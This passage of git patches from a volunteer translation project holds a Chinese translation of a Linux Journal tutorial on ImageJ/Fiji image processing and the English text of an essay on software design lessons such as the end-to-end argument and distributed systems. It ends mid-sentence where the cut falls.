pm](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 1. ![](https://secure.gravatar.com/avatar/e2a054bf6bb7d43b4a8ce007dc435c49?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F2a054b%2Ffff%26text%3DN&r=g) - -noman says - -Eddie G. Notice that you did say "was", not" is": -"it was running Windows XP" - -[Nov 20, 2017 at 4:38 am](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 1. ![](https://secure.gravatar.com/avatar/0a55a43591e9d2cd8453d0727314dc51?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F589a70%2Ffff%26text%3DE&r=g) - -Eddie G. says - -Noman: I said it WAS running Windows XP, but that….THAT was how old it IS……to -point out the fact that not many people are still using hardware from 2011. I -was trying to show that you can install Linux on an old laptop and have it -work fine for a LONG TIME, with nothing more than the regular updates and -upgrades. And while I know (as do we all!) that some technology will die off -and be replaced by better, the standards are there and will be for a while. So -you could say….purchase a really decent machine today in 2017 and running -Linux?….along with regular updates and the like…..could well see that machine -into the year 2025! You can't do that with Windows. And I shouldn't say can't -but you wouldn't be able to without having to re-install your OS after getting -hit with something that had malicious intent!. - -[Nov 20, 2017 at 7:53 pm](https://www.maketecheasier.com/remember-linux- -commands/) Reply - -### Leave a Reply [Cancel reply](https://www.maketecheasier.com/remember- -linux-commands/) - -Yeah! You've decided to leave a comment. That's fantastic! Check out our -[comment policy](https://www.maketecheasier.com/remember-linux- -commands/) here. -Let's have a personal and meaningful conversation. - -Name: - -Email: - -Leave your comment here: - -Notify me of follow-up comments by email. - -Notify me of new posts by email. - -Leave this field blank. - -#### Popular Posts - -[![](https://www.maketecheasier.com/assets/uploads/2017/09/custom-linux- -distro-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/custom- -linux-distro-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[8 Tools to Easily Create Your Own Custom Linux -Distro](https://www.maketecheasier.com/remember-linux- -commands/) - -[![](https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity- -apps-00-Featured-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/Linux- -productivity- -apps-00-Featured-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[10 Free Linux Productivity Apps You Haven't Heard -Of](https://www.maketecheasier.com/remember-linux- -commands/) - -[![](https://www.maketecheasier.com/assets/uploads/2017/09/zfs- -feat-194x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/zfs- -feat-194x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[How to Use the ZFS Filesystem on Ubuntu -Linux](https://www.maketecheasier.com/remember-linux- -commands/) - -[![](https://www.maketecheasier.com/assets/uploads/2017/08/gauth- -feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/08/gauth- -feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[How to Set Up Two-Factor Authentication in -Ubuntu](https://www.maketecheasier.com/remember-linux- -commands/) - -[![](https://www.maketecheasier.com/assets/uploads/2017/09/wine-games- -feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/wine-games- -feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[10 Games You Can Play on Linux with -Wine](https://www.maketecheasier.com/remember-linux- -commands/) - -[![](https://www.maketecheasier.com/assets/uploads/2017/11/linux-distros- -gaming-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/11/linux- -distros-gaming-200x100.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[5 of the Best Linux Distros for -Gaming](https://www.maketecheasier.com/remember-linux- -commands/) - -#### Get more stuff like this in your inbox - -Daily Update Weekly Roundup Deals & Giveaway Apps Discovery - -Subscribe Now - -we respect your privacy and take protecting it seriously - -[See All Newsletters »](https://www.maketecheasier.com/remember-linux- -commands/) - - * [__](https://www.maketecheasier.com/remember-linux-commands/) - * [__](https://www.maketecheasier.com/remember-linux-commands/) - * [__](https://www.maketecheasier.com/remember-linux-commands/) - * [__](https://www.maketecheasier.com/remember-linux-commands/) - * [__](https://www.maketecheasier.com/remember-linux-commands/) - * [__](https://www.maketecheasier.com/remember-linux-commands/) - - * [About](https://www.maketecheasier.com/remember-linux-commands/) - * [Contact](https://www.maketecheasier.com/remember-linux-commands/) - * [Advertise](https://www.maketecheasier.com/remember-linux-commands/) - * [Write For Us](https://www.maketecheasier.com/remember-linux-commands/) - * [Terms of Use](https://www.maketecheasier.com/remember-linux-commands/) - * [Privacy Policy](https://www.maketecheasier.com/remember-linux-commands/) - * [RSS Feed Terms](https://www.maketecheasier.com/remember-linux-commands/) - -(C) 2007 - 2017 Uqnic Network Pte Ltd. All rights reserved. -[Make Tech Easier](https://www.maketecheasier.com/remember-linux- -commands/) is a member of the Uqnic Network. - -__ - -------------------------------------------------------------------------------- via: https://www.maketecheasier.com/remember-linux-commands/ -作者:[Eric Raymond ][a] +作者:[Nick Congleton][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) From 92f3a8a6b1fad648166b856b636b91b55ba554f9 Mon Sep 17 00:00:00 2001 From: XYenChi <466530436@qq.com> Date: Tue, 28 Nov 2017 12:58:26 +0800 Subject: [PATCH 0024/1627] translated --- .../20171017 Image Processing on Linux.md | 97 ------------------- .../20171017 Image Processing on Linux.md | 94 ++++++++++++++++++ 2 files changed, 94 insertions(+), 97 deletions(-) delete mode 100644 sources/tech/20171017 Image Processing on Linux.md create mode 100644 translated/tech/20171017 Image Processing on Linux.md diff --git a/sources/tech/20171017 Image Processing on Linux.md b/sources/tech/20171017 Image Processing on Linux.md deleted file mode 100644 index 605ba7c995..0000000000 --- a/sources/tech/20171017 Image Processing on Linux.md +++ /dev/null @@ -1,97 +0,0 @@ -Image Processing on Linux -============================================================ - - -I've covered several scientific packages in this space that generate nice graphical representations of your data and work, but I've not gone in the other direction much. So in this article, I cover a popular image processing package called ImageJ. Specifically, I am looking at [Fiji][4], an instance of ImageJ bundled with a set of plugins that are useful for scientific image processing. - -The name Fiji is a recursive acronym, much like GNU. It stands for "Fiji Is Just ImageJ". ImageJ is a useful tool for analyzing images in scientific research—for example, you may use it for classifying tree types in a landscape from aerial photography. ImageJ can do that type categorization. It's built with a plugin architecture, and a very extensive collection of plugins is available to increase the available functionality. - -The first step is to install ImageJ (or Fiji). Most distributions will have a package available for ImageJ. If you wish, you can install it that way and then install the individual plugins you need for your research. The other option is to install Fiji and get the most commonly used plugins at the same time. Unfortunately, most Linux distributions will not have a package available within their package repositories for Fiji. Luckily, however, an easy installation file is available from the main website. It's a simple zip file, containing a directory with all of the files required to run Fiji. When you first start it, you get only a small toolbar with a list of menu items (Figure 1). - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif1.png) - -Figure 1\. You get a very minimal interface when you first start Fiji. - -If you don't already have some images to use as you are learning to work with ImageJ, the Fiji installation includes several sample images. Click the File→Open Samples menu item for a dropdown list of sample images (Figure 2). These samples cover many of the potential tasks you might be interested in working on. - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif2.jpg) - -Figure 2\. Several sample images are available that you can use as you learn how to work with ImageJ. - -If you installed Fiji, rather than ImageJ alone, a large set of plugins already will be installed. The first one of note is the autoupdater plugin. This plugin checks the internet for updates to ImageJ, as well as the installed plugins, each time ImageJ is started. - -All of the installed plugins are available under the Plugins menu item. Once you have installed a number of plugins, this list can become a bit unwieldy, so you may want to be judicious in your plugin selection. If you want to trigger the updates manually, click the Help→Update Fiji menu item to force the check and get a list of available updates (Figure 3). - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif3.png) - -Figure 3\. You can force a manual check of what updates are available. - -Now, what kind of work can you do with Fiji/ImageJ? One example is doing counts of objects within an image. You can load a sample by clicking File→Open Samples→Embryos. - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif4.jpg) - -Figure 4\. With ImageJ, you can count objects within an image. - -The first step is to set a scale to the image so you can tell ImageJ how to identify objects. First, select the line button on the toolbar and draw a line over the length of the scale legend on the image. You then can select Analyze→Set Scale, and it will set the number of pixels that the scale legend occupies (Figure 5). You can set the known distance to be 100 and the units to be "um". - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif5.png) - -Figure 5\. For many image analysis tasks, you need to set a scale to the image. - -The next step is to simplify the information within the image. Click Image→Type→8-bit to reduce the information to an 8-bit gray-scale image. To isolate the individual objects, click Process→Binary→Make Binary to threshold the image automatically (Figure 6). - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif6.png) - -Figure 6\. There are tools to do automatic tasks like thresholding. - -Before you can count the objects within the image, you need to remove artifacts like the scale legend. You can do that by using the rectangular selection tool to select it and then click Edit→Clear. Now you can analyze the image and see what objects are there. - -Making sure that there are no areas selected in the image, click Analyze→Analyze Particles to pop up a window where you can select the minimum size, what results to display and what to show in the final image (Figure 7). - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif7.png) - -Figure 7\. You can generate a reduced image with identified particles. - -Figure 8 shows an overall look at what was discovered in the summary results window. There is also a detailed results window for each individual particle. - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif8.png) - -Figure 8\. One of the output results includes a summary list of the particles identified. - -Once you have an analysis worked out for a given image type, you often need to apply the exact same analysis to a series of images. This series may number into the thousands, so it's typically not something you will want to repeat manually for each image. In such cases, you can collect the required steps together into a macro so that they can be reapplied multiple times. Clicking Plugins→Macros→Record pops up a new window where all of your subsequent commands will be recorded. Once all of the steps are finished, you can save them as a macro file and rerun them on other images by clicking Plugins→Macros→Run. - -If you have a very specific set of steps for your workflow, you simply can open the macro file and edit it by hand, as it is a simple text file. There is actually a complete macro language available to you to control the process that is being applied to your images more fully. - -If you have a really large set of images that needs to be processed, however, this still might be too tedious for your workflow. In that case, go to Process→Batch→Macro to pop up a new window where you can set up your batch processing workflow (Figure 9). - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif9.png) - -Figure 9\. You can run a macro on a batch of input image files with a single command. - -From this window, you can select which macro file to apply, the source directory where the input images are located and the output directory where you want the output images to be written. You also can set the output file format and filter the list of images being used as input based on what the filename contains. Once everything is done, start the batch run by clicking the Process button at the bottom of the window. - -If this is a workflow that will be repeated over time, you can save the batch process to a text file by clicking the Save button at the bottom of the window. You then can reload the same workflow by clicking the Open button, also at the bottom of the window. All of this functionality allows you to automate the most tedious parts of your research so you can focus on the actual science. - -Considering that there are more than 500 plugins and more than 300 macros available from the main ImageJ website alone, it is an understatement that I've been able to touch on only the most basic of topics in this short article. Luckily, many domain-specific tutorials are available, along with the very good documentation for the core of ImageJ from the main project website. If you think this tool could be of use to your research, there is a wealth of information to guide you in your particular area of study. - --------------------------------------------------------------------------------- - -作者简介: - -Joey Bernard has a background in both physics and computer science. This serves him well in his day job as a computational research consultant at the University of New Brunswick. He also teaches computational physics and parallel programming. - --------------------------------- - -via: https://www.linuxjournal.com/content/image-processing-linux - -作者:[Joey Bernard][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxjournal.com/users/joey-bernard -[1]:https://www.linuxjournal.com/tag/science -[2]:https://www.linuxjournal.com/tag/statistics -[3]:https://www.linuxjournal.com/users/joey-bernard -[4]:https://imagej.net/Fiji diff --git a/translated/tech/20171017 Image Processing on Linux.md b/translated/tech/20171017 Image Processing on Linux.md new file mode 100644 index 0000000000..d02c2f3bd4 --- /dev/null +++ b/translated/tech/20171017 Image Processing on Linux.md @@ -0,0 +1,94 @@ +Linux上的图像处理 +============================================================ + + +我发现了很多生成图像表示你的数据和工作的系统软件,但是我不能写太多其他东西。因此在这篇文章中,包含了一款叫 ImageJ 的热门图像处理软件。特别的,我注意到了 [Fiji][4], 一例绑定了科学性图像处理的系列插件的 ImageJ 版本。 + +Fiji这个名字是一个循环缩略词,很像 GNU 。代表着 "Fiji Is Just ImageJ"。 ImageJ 是科学研究领域进行图像分析的实用工具——例如你可以用它来辨认航拍风景图中树的种类。 ImageJ 能划分物品种类。它以插件架构制成,海量插件供选择以提升使用灵活度。 + +首先是安装 ImageJ (或 Fiji). 大多数的 ImageJ 发行版都可使用软件包。你愿意的话,可以以这种方式安装它然后为你的研究安装所需的独立插件。另一种选择是安装 Fiji 的同时获取最常用的插件。不幸的是,大多数 Linux 发行版的软件中心不会有可用的 Fiji 安装包。幸而,官网上的简单安装文件是可以使用的。包含了运行 Fiji 需要的所有文件目录。第一次启动时,会给一个有菜单项列表的工具栏。(图1) + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif1.png) + +图 1\.第一次打开 Fiji 有一个最小化的界面。 + +如果你没有备好图片来练习使用 ImageJ ,Fiji 安装包包含了一些示例图片。点击文件->打开示例图片的下拉菜单选项(图2)。这些案例包含了许多你可能有兴趣做的任务。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif2.jpg) + +图 2\. 案例图片可供学习使用 ImageJ。 + +安装了 Fiji,而不是单纯的 ImageJ ,大量插件也会被安装。首先要注意的是自动更新插件。每次打开 ImageJ ,该插件联网检验 ImageJ 和已安装插件的更新。所有已安装的插件都在插件菜单项中可选。一旦你安装了很多插件,列表会变得冗杂,所以需要精简你的插件选项。你想手动更新的话,点击帮助->更新 Fiji 菜单项强制检测获取可用更新列表(图3)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif3.png) + +图 3\. 强制手动检测可用更新。 + +那么,Now,用 Fiji/ImageJ 可以做什么呢?举一例,图片中的物品数。你可以通过点击文件->打开示例->胚芽来载入一例。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif4.jpg) + +图 4\. 用 ImageJ算出图中的物品数。 + +第一步设定图片的范围这样你可以告诉 ImageJ 如何判别物品。首先,选择在工具栏选择线条按钮。然后选择分析->设定范围,然后就会设置范围内包含的像素点个数(图 5)。你可以设置已知距离为100,单元为“um”。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif5.png) + +图 5\. 很多图片分析任务需要对图片设定一个范围。 + +接下来的步骤是简化图片内的信息。点击图片->类型->8比特来减少信息量到8比特灰度图片。点击处理->二进制->图片定界, 以分隔独立物体。点击处理->二进制->设置二进制来自动给图片定界(图 6)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif6.png) + +图 6\. 有些像开关一样完成自动任务的工具。 + +图片内的物品计数前,你需要移除像范围轮廓之类的人工操作。可以用三角选择工具来选中它并点击编辑->清空来完成这项操作。现在你可以分析图片看看这里是啥物体。 + +确保图中没有区域被选中,点击分析->分析最小粒子弹出窗口来选择最小尺寸,这决定了最后的图片会展示什么(图7)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif7.png) + +图 7\.你可以通过确定最小尺寸生成一个缩减过的图片。 + +图 8 在总结窗口展示了一个概览。每个最小点也有独立的细节窗口。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif8.png) + +图 8\. 包含了已知最小点总览清单的输出结果。 + +只要你有一个分析程序来给定图片类型,相同的程序往往需要被应用到一系列图片当中。可能数以千计,你当然不会想对每张图片手动重复操作。这时候,你可以集中必要步骤到宏这样它们可以被应用多次。点击插件->宏- >记录弹出一个新的窗口记录你随后的所有命令。所有步骤一完成,你可以将之保存为一个宏文件并且通过点击插件->宏->运行来在其他图片上重复运行。 + +如果你有特定的工作步骤,你可以轻易打开宏文件并手动编辑它,因为它是一个简单的文本文件。事实上有一套完整的宏语言可供你更加充分地控制图片处理过程。 + +然而,如果你有真的非常多的系列图片需要处理,这也将是冗长乏味的工作。这种情况下,前往过程->批量->宏弹出一个新窗口你可以批量处理工作(图9)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif9.png) + +图 9\. 在批量输出图片时用简单命令运行宏。 + +这个窗口中,你能选择应用哪个宏文件,输入图片所在的源目录和你想写入输出图片的输出目录。也可以设置输出文件格式及通过文件名筛选输入图片中需要使用的。万事具备,点击窗口下方的的处理按钮开始批量操作。 + +若这是会重复多次的工作,你可以点击窗口底部的保存按钮保存批量处理到一个文本文件。点击也在窗口底部的开始按钮重载相同的工作。所有的应用都使得研究中最冗余部分自动化,这样你就可以在重点放在实际的科学研究中。 +考虑到单单是 ImageJ 主页就有超过500个插件和超过300种宏可供使用,简短起见,我只能在这篇短文中提出最基本的话题。幸运的是,有很多专业领域的教程可供使用,项目主页上还有关于 ImageJ 核心的非常棒的文档。如果觉得这个工具对研究有用,你研究的专业领域也会有很多信息指引你。 + +-------------------------------------------------------------------------------- + +作者简介: + +Joey Bernard 有物理学和计算机科学的相关背景。这对他在新不伦瑞克大学当计算研究顾问的日常工作大有裨益。他也教计算物理和并行程序规划。 + +-------------------------------- + +via: https://www.linuxjournal.com/content/image-processing-linux + +作者:[Joey Bernard][a] +译者:[XYenChi](https://github.com/XYenChi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/joey-bernard +[1]:https://www.linuxjournal.com/tag/science +[2]:https://www.linuxjournal.com/tag/statistics +[3]:https://www.linuxjournal.com/users/joey-bernard +[4]:https://imagej.net/Fiji From 7c63af4b090df7906ccba6aada3c426061ddf00a Mon Sep 17 00:00:00 2001 From: Han Pei-Ru Date: Tue, 28 Nov 2017 15:33:06 +0800 Subject: [PATCH 0025/1627] translated by explosic4 --- .../20170320 Education of a Programmer.md | 157 ---------------- .../20170320 Education of a Programmer.md | 167 ++++++++++++++++++ 2 files changed, 167 insertions(+), 157 deletions(-) delete mode 100644 sources/talk/20170320 Education of a Programmer.md create mode 100644 translated/talk/20170320 Education of a Programmer.md diff --git a/sources/talk/20170320 Education of a Programmer.md b/sources/talk/20170320 Education of a Programmer.md deleted file mode 100644 index ae0da4638d..0000000000 --- a/sources/talk/20170320 Education of a Programmer.md +++ /dev/null @@ -1,157 +0,0 @@ -translating by @explosic4 - -Education of a Programmer -============================================================ - -_When I left Microsoft in October 2016 after almost 21 years there and almost 35 years in the industry, I took some time to reflect on what I had learned over all those years. This is a lightly edited version of that post. Pardon the length!_ - -There are an amazing number of things you need to know to be a proficient programmer — details of languages, APIs, algorithms, data structures, systems and tools. These things change all the time — new languages and programming environments spring up and there always seems to be some hot new tool or language that “everyone” is using. It is important to stay current and proficient. A carpenter needs to know how to pick the right hammer and nail for the job and needs to be competent at driving the nail straight and true. - -At the same time, I’ve found that there are some concepts and strategies that are applicable over a wide range of scenarios and across decades. We have seen multiple orders of magnitude change in the performance and capability of our underlying devices and yet certain ways of thinking about the design of systems still say relevant. These are more fundamental than any specific implementation. Understanding these recurring themes is hugely helpful in both the analysis and design of the complex systems we build. - -Humility and Ego - -This is not limited to programming, but in an area like computing which exhibits so much constant change, one needs a healthy balance of humility and ego. There is always more to learn and there is always someone who can help you learn it — if you are willing and open to that learning. One needs both the humility to recognize and acknowledge what you don’t know and the ego that gives you confidence to master a new area and apply what you already know. The biggest challenges I have seen are when someone works in a single deep area for a long time and “forgets” how good they are at learning new things. The best learning comes from actually getting hands dirty and building something, even if it is just a prototype or hack. The best programmers I know have had both a broad understanding of technology while at the same time have taken the time to go deep into some technology and become the expert. The deepest learning happens when you struggle with truly hard problems. - -End to End Argument - -Back in 1981, Jerry Saltzer, Dave Reed and Dave Clark were doing early work on the Internet and distributed systems and wrote up their [classic description][4] of the end to end argument. There is much misinformation out there on the Internet so it can be useful to go back and read the original paper. They were humble in not claiming invention — from their perspective this was a common engineering strategy that applies in many areas, not just in communications. They were simply writing it down and gathering examples. A minor paraphrasing is: - -When implementing some function in a system, it can be implemented correctly and completely only with the knowledge and participation of the endpoints of the system. In some cases, a partial implementation in some internal component of the system may be important for performance reasons. - -The SRC paper calls this an “argument”, although it has been elevated to a “principle” on Wikipedia and in other places. In fact, it is better to think of it as an argument — as they detail, one of the hardest problem for a system designer is to determine how to divide responsibilities between components of a system. This ends up being a discussion that involves weighing the pros and cons as you divide up functionality, isolate complexity and try to design a reliable, performant system that will be flexible to evolving requirements. There is no simple set of rules to follow. - -Much of the discussion on the Internet focuses on communications systems, but the end-to-end argument applies in a much wider set of circumstances. One example in distributed systems is the idea of “eventual consistency”. An eventually consistent system can optimize and simplify by letting elements of the system get into a temporarily inconsistent state, knowing that there is a larger end-to-end process that can resolve these inconsistencies. I like the example of a scaled-out ordering system (e.g. as used by Amazon) that doesn’t require every request go through a central inventory control choke point. This lack of a central control point might allow two endpoints to sell the same last book copy, but the overall system needs some type of resolution system in any case, e.g. by notifying the customer that the book has been backordered. That last book might end up getting run over by a forklift in the warehouse before the order is fulfilled anyway. Once you realize an end-to-end resolution system is required and is in place, the internal design of the system can be optimized to take advantage of it. - -In fact, it is this design flexibility in the service of either ongoing performance optimization or delivering other system features that makes this end-to-end approach so powerful. End-to-end thinking often allows internal performance flexibility which makes the overall system more robust and adaptable to changes in the characteristics of each of the components. This makes an end-to-end approach “anti-fragile” and resilient to change over time. - -An implication of the end-to-end approach is that you want to be extremely careful about adding layers and functionality that eliminates overall performance flexibility. (Or other flexibility, but performance, especially latency, tends to be special.) If you expose the raw performance of the layers you are built on, end-to-end approaches can take advantage of that performance to optimize for their specific requirements. If you chew up that performance, even in the service of providing significant value-add functionality, you eliminate design flexibility. - -The end-to-end argument intersects with organizational design when you have a system that is large and complex enough to assign whole teams to internal components. The natural tendency of those teams is to extend the functionality of those components, often in ways that start to eliminate design flexibility for applications trying to deliver end-to-end functionality built on top of them. - -One of the challenges in applying the end-to-end approach is determining where the end is. “Little fleas have lesser fleas… and so on ad infinitum.” - -Concentrating Complexity - -Coding is an incredibly precise art, with each line of execution required for correct operation of the program. But this is misleading. Programs are not uniform in the overall complexity of their components or the complexity of how those components interact. The most robust programs isolate complexity in a way that lets significant parts of the system appear simple and straightforward and interact in simple ways with other components in the system. Complexity hiding can be isomorphic with other design approaches like information hiding and data abstraction but I find there is a different design sensibility if you really focus on identifying where the complexity lies and how you are isolating it. - -The example I’ve returned to over and over again in my [writing][5] is the screen repaint algorithm that was used by early character video terminal editors like VI and EMACS. The early video terminals implemented control sequences for the core action of painting characters as well as additional display functions to optimize redisplay like scrolling the current lines up or down or inserting new lines or moving characters within a line. Each of those commands had different costs and those costs varied across different manufacturer’s devices. (See [TERMCAP][6] for links to code and a fuller history.) A full-screen application like a text editor wanted to update the screen as quickly as possible and therefore needed to optimize its use of these control sequences to transition the screen from one state to another. - -These applications were designed so this underlying complexity was hidden. The parts of the system that modify the text buffer (where most innovation in functionality happens) completely ignore how these changes are converted into screen update commands. This is possible because the performance cost of computing the optimal set of updates for  _any_  change in the content is swamped by the performance cost of actually executing the update commands on the terminal itself. It is a common pattern in systems design that performance analysis plays a key part in determining how and where to hide complexity. The screen update process can be asynchronous to the changes in the underlying text buffer and can be independent of the actual historical sequence of changes to the buffer. It is not important  _how_  the buffer changed, but only  _what_  changed. This combination of asynchronous coupling, elimination of the combinatorics of historical path dependence in the interaction between components and having a natural way for interactions to efficiently batch together are common characteristics used to hide coupling complexity. - -Success in hiding complexity is determined not by the component doing the hiding but by the consumers of that component. This is one reason why it is often so critical for a component provider to actually be responsible for at least some piece of the end-to-end use of that component. They need to have clear optics into how the rest of the system interacts with their component and how (and whether) complexity leaks out. This often shows up as feedback like “this component is hard to use” — which typically means that it is not effectively hiding the internal complexity or did not pick a functional boundary that was amenable to hiding that complexity. - -Layering and Componentization - -It is the fundamental role of a system designer to determine how to break down a system into components and layers; to make decisions about what to build and what to pick up from elsewhere. Open Source may keep money from changing hands in this “build vs. buy” decision but the dynamics are the same. An important element in large scale engineering is understanding how these decisions will play out over time. Change fundamentally underlies everything we do as programmers, so these design choices are not only evaluated in the moment, but are evaluated in the years to come as the product continues to evolve. - -Here are a few things about system decomposition that end up having a large element of time in them and therefore tend to take longer to learn and appreciate. - -* Layers are leaky. Layers (or abstractions) are [fundamentally leaky][1]. These leaks have consequences immediately but also have consequences over time, in two ways. One consequence is that the characteristics of the layer leak through and permeate more of the system than you realize. These might be assumptions about specific performance characteristics or behavior ordering that is not an explicit part of the layer contract. This means that you generally are more  _vulnerable_  to changes in the internal behavior of the component that you understood. A second consequence is it also means you are more  _dependent_  on that internal behavior than is obvious, so if you consider changing that layer the consequences and challenges are probably larger than you thought. -* Layers are too functional. It is almost a truism that a component you adopt will have more functionality than you actually require. In some cases, the decision to use it is based on leveraging that functionality for future uses. You adopt specifically because you want to “get on the train” and leverage the ongoing work that will go into that component. There are a few consequences of building on this highly functional layer. 1) The component will often make trade-offs that are biased by functionality that you do not actually require. 2) The component will embed complexity and constraints because of functionality you do not require and those constraints will impede future evolution of that component. 3) There will be more surface area to leak into your application. Some of that leakage will be due to true “leaky abstractions” and some will be explicit (but generally poorly controlled) increased dependence on the full capabilities of the component. Office is big enough that we found that for any layer we built on, we eventually fully explored its functionality in some part of the system. While that might appear to be positive (we are more completely leveraging the component), all uses are not equally valuable. So we end up having a massive cost to move from one layer to another based on this long-tail of often lower value and poorly recognized use cases. 4) The additional functionality creates complexity and opportunities for misuse. An XML validation API we used would optionally dynamically download the schema definition if it was specified as part of the XML tree. This was mistakenly turned on in our basic file parsing code which resulted in both a massive performance degradation as well as an (unintentional) distributed denial of service attack on a w3c.org web server. (These are colloquially known as “land mine” APIs.) -* Layers get replaced. Requirements evolve, systems evolve, components are abandoned. You eventually need to replace that layer or component. This is true for external component dependencies as well as internal ones. This means that the issues above will end up becoming important. -* Your build vs. buy decision will change. This is partly a corollary of above. This does not mean the decision to build or buy was wrong at the time. Often there was no appropriate component when you started and it only becomes available later. Or alternatively, you use a component but eventually find that it does not match your evolving requirements and your requirements are narrow enough, well-understood or so core to your value proposition that it makes sense to own it yourself. It does mean that you need to be just as concerned about leaky layers permeating more of the system for layers you build as well as for layers you adopt. -* Layers get thick. As soon as you have defined a layer, it starts to accrete functionality. The layer is the natural throttle point to optimize for your usage patterns. The difficulty with a thick layer is that it tends to reduce your ability to leverage ongoing innovation in underlying layers. In some sense this is why OS companies hate thick layers built on top of their core evolving functionality — the pace at which innovation can be adopted is inherently slowed. One disciplined approach to avoid this is to disallow any additional state storage in an adaptor layer. Microsoft Foundation Classes took this general approach in building on top of Win32\. It is inevitably cheaper in the short term to just accrete functionality on to an existing layer (leading to all the eventual problems above) rather than refactoring and recomponentizing. A system designer who understands this looks for opportunities to break apart and simplify components rather than accrete more and more functionality within them. - -Einsteinian Universe - -I had been designing asynchronous distributed systems for decades but was struck by this quote from Pat Helland, a SQL architect, at an internal Microsoft talk. “We live in an Einsteinian universe — there is no such thing as simultaneity. “ When building distributed systems — and virtually everything we build is a distributed system — you cannot hide the distributed nature of the system. It’s just physics. This is one of the reasons I’ve always felt Remote Procedure Call, and especially “transparent” RPC that explicitly tries to hide the distributed nature of the interaction, is fundamentally wrong-headed. You need to embrace the distributed nature of the system since the implications almost always need to be plumbed completely through the system design and into the user experience. - -Embracing the distributed nature of the system leads to a number of things: - -* You think through the implications to the user experience from the start rather than trying to patch on error handling, cancellation and status reporting as an afterthought. -* You use asynchronous techniques to couple components. Synchronous coupling is  _impossible._  If something appears synchronous, it’s because some internal layer has tried to hide the asynchrony and in doing so has obscured (but definitely not hidden) a fundamental characteristic of the runtime behavior of the system. -* You recognize and explicitly design for interacting state machines and that these states represent robust long-lived internal system states (rather than ad-hoc, ephemeral and undiscoverable state encoded by the value of variables in a deep call stack). -* You recognize that failure is expected. The only guaranteed way to detect failure in a distributed system is to simply decide you have waited “too long”. This naturally means that [cancellation is first-class][2]. Some layer of the system (perhaps plumbed through to the user) will need to decide it has waited too long and cancel the interaction. Cancelling is only about reestablishing local state and reclaiming local resources — there is no way to reliably propagate that cancellation through the system. It can sometimes be useful to have a low-cost, unreliable way to attempt to propagate cancellation as a performance optimization. -* You recognize that cancellation is not rollback since it is just reclaiming local resources and state. If rollback is necessary, it needs to be an end-to-end feature. -* You accept that you can never really know the state of a distributed component. As soon as you discover the state, it may have changed. When you send an operation, it may be lost in transit, it might be processed but the response is lost, or it may take some significant amount of time to process so the remote state ultimately transitions at some arbitrary time in the future. This leads to approaches like idempotent operations and the ability to robustly and efficiently rediscover remote state rather than expecting that distributed components can reliably track state in parallel. The concept of “[eventual consistency][3]” succinctly captures many of these ideas. - -I like to say you should “revel in the asynchrony”. Rather than trying to hide it, you accept it and design for it. When you see a technique like idempotency or immutability, you recognize them as ways of embracing the fundamental nature of the universe, not just one more design 